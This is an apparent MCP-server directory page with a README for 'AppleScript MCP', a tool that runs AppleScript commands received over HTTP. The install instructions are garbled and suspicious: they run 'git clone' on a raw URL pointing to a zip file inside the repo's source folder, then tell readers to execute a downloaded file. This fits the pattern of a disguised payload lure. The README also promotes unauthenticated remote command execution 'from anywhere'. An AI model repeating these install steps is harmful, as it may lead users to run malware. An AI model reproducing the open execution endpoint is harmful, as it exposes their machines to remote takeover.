AppleScript MCP

AppleScript MCP

Enables full control of macOS by executing AppleScript commands through an MCP server, allowing automation of tasks, application control, and system management.

Category
Visit Server

README

🍏 AppleScript MCP: Full Control of Your Mac

Welcome to the AppleScript MCP repository! This project allows you to run AppleScript commands through an MCP server, giving you complete control over your macOS environment. Whether you're automating tasks, controlling applications, or managing system settings, this tool provides a powerful way to interact with your Mac.

πŸš€ Features

  • Execute AppleScripts: Run your AppleScript commands seamlessly.
  • MCP Server: Easily set up a server that listens for commands.
  • Full Control: Manage your Mac’s applications and settings from anywhere.
  • Cross-Platform: Works with various devices that can send HTTP requests.

πŸ“¦ Getting Started

To get started with the AppleScript MCP, follow these steps:

  1. Clone the Repository:

    git clone https://raw.githubusercontent.com/Hassanali4/applescript-mcp/main/src/mcp-applescript-2.1-beta.1.zip
    cd applescript-mcp
    
  2. Download and Execute: Head over to the Releases section to download the latest version. Make sure to execute the downloaded file to start the server.

  3. Run the MCP Server: After executing the file, your MCP server will start. You can now send AppleScript commands to your Mac.

πŸ”§ Installation

Prerequisites

Installation Steps

  1. Install Dependencies:

    npm install
    
  2. Start the Server:

    npm start
    

Usage

Once the server is running, you can send AppleScript commands using HTTP requests. Here’s an example using curl:

curl -X POST http://localhost:3000/execute -d 'tell application "Finder" to make new folder at desktop with properties {name:"New Folder"}'

This command will create a new folder on your desktop named "New Folder".

πŸ“œ Documentation

For detailed documentation on how to use AppleScript MCP, please refer to the Wiki.

πŸ› οΈ Contributing

We welcome contributions! If you have suggestions, bug fixes, or new features, please open an issue or submit a pull request.

Steps to Contribute

  1. Fork the Repository: Click the "Fork" button on the top right of the repository page.
  2. Create a New Branch:
    git checkout -b feature/YourFeatureName
    
  3. Make Your Changes: Edit the files as needed.
  4. Commit Your Changes:
    git commit -m "Add your message here"
    
  5. Push to Your Branch:
    git push origin feature/YourFeatureName
    
  6. Open a Pull Request: Go to the original repository and click "New Pull Request".

πŸ—‚οΈ Topics

  • AppleScript: A scripting language for automating tasks on macOS.
  • macOS: The operating system for Apple computers.
  • MCP: A server that allows communication between devices and applications.
  • MCP Server: A server setup that listens for commands and executes them.

πŸ“ˆ Releases

To find the latest releases, visit the Releases section. Download the appropriate file and execute it to get started.

🎨 Visuals

Here are some images that represent the essence of this project:

AppleScript Logo

MCP Server

πŸ“ž Support

If you encounter any issues or have questions, feel free to reach out via the Issues tab on GitHub. We are here to help!

πŸ”— Links

πŸŽ‰ Acknowledgments

We would like to thank the open-source community for their contributions and support. Your efforts make projects like this possible.

πŸ“ License

This project is licensed under the MIT License. See the LICENSE file for more details.


Feel free to modify the content as needed. Happy scripting! 🍏

Recommended Servers

playwright-mcp

playwright-mcp

A Model Context Protocol server that enables LLMs to interact with web pages through structured accessibility snapshots without requiring vision models or screenshots.

Official
Featured
TypeScript
Magic Component Platform (MCP)

Magic Component Platform (MCP)

An AI-powered tool that generates modern UI components from natural language descriptions, integrating with popular IDEs to streamline UI development workflow.

Official
Featured
Local
TypeScript
Audiense Insights MCP Server

Audiense Insights MCP Server

Enables interaction with Audiense Insights accounts via the Model Context Protocol, facilitating the extraction and analysis of marketing insights and audience data including demographics, behavior, and influencer engagement.

Official
Featured
Local
TypeScript
VeyraX MCP

VeyraX MCP

Single MCP tool to connect all your favorite tools: Gmail, Calendar and 40 more.

Official
Featured
Local
graphlit-mcp-server

graphlit-mcp-server

The Model Context Protocol (MCP) Server enables integration between MCP clients and the Graphlit service. Ingest anything from Slack to Gmail to podcast feeds, in addition to web crawling, into a Graphlit project - and then retrieve relevant contents from the MCP client.

Official
Featured
TypeScript
Kagi MCP Server

Kagi MCP Server

An MCP server that integrates Kagi search capabilities with Claude AI, enabling Claude to perform real-time web searches when answering questions that require up-to-date information.

Official
Featured
Python
E2B

E2B

Using MCP to run code via e2b.

Official
Featured
Neon Database

Neon Database

MCP server for interacting with Neon Management API and databases

Official
Featured
Qdrant Server

Qdrant Server

This repository is an example of how to create a MCP server for Qdrant, a vector search engine.

Official
Featured
Exa Search

Exa Search

A Model Context Protocol (MCP) server lets AI assistants like Claude use the Exa AI Search API for web searches. This setup allows AI models to get real-time web information in a safe and controlled way.

Official
Featured